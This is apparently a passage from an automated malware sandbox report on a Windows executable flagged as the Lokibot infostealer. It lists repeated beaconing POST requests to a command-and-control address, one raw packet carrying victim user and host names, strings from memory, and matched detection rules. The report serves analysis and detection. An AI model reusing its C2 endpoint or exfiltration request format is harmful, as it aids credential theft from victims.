Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_00404ED4 recv, 2_2_00404ED4
Source: unknown HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 176Connection: close
Source: SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2811909354.00000000004A0000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://45.77.223.48/~blog/?ajax=posts.php
Source: SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.77.223.48/~blog/?ajax=posts.phpJ
Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.77.223.48/~blog/?feed=comments-rss2
Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.77.223.48/~blog/?feed=rss2
Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.77.223.48/~blog/index.php?rest_route=/
Source: SCB#89940578.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: SCB#89940578.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: SCB#89940578.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: SCB#89940578.exe, SCB#89940578.exe, 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: SCB#89940578.exe, 00000000.00000002.1708357533.00000000054E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.comJ
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.w.org/
Source: SCB#89940578.exe String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

System Summary

barindex
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_0298D2A4 0_2_0298D2A4
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_04F38D08 0_2_04F38D08
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_04F30040 0_2_04F30040
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_04F38CF9 0_2_04F38CF9
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_073723E0 0_2_073723E0
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_073720C8 0_2_073720C8
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07371688 0_2_07371688
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07371450 0_2_07371450
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07371441 0_2_07371441
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_073723D1 0_2_073723D1
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_0737F3C8 0_2_0737F3C8
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07370228 0_2_07370228
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07370219 0_2_07370219
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_0737D2B8 0_2_0737D2B8
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_0737D2A9 0_2_0737D2A9
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07370006 0_2_07370006
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07373070 0_2_07373070
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07373060 0_2_07373060
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_073720B8 0_2_073720B8
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_073710E0 0_2_073710E0
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_073710D1 0_2_073710D1
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07375F70 0_2_07375F70
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07375F61 0_2_07375F61
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_0737EF90 0_2_0737EF90
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_0737EF82 0_2_0737EF82
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_0737CE80 0_2_0737CE80
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_0737CA48 0_2_0737CA48
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_07374910 0_2_07374910
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 0_2_0737490E 0_2_0737490E
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_0040549C 2_2_0040549C
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_004029D4 2_2_004029D4
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: String function: 00405B6F appears 42 times
Source: SCB#89940578.exe Static PE information: invalid certificate
Source: SCB#89940578.exe, 00000000.00000002.1709695361.0000000009FD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SCB#89940578.exe
Source: SCB#89940578.exe, 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SCB#89940578.exe
Source: SCB#89940578.exe, 00000000.00000002.1705262082.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SCB#89940578.exe
Source: SCB#89940578.exe Binary or memory string: OriginalFilenameHCJ.exeX vs SCB#89940578.exe
Source: SCB#89940578.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
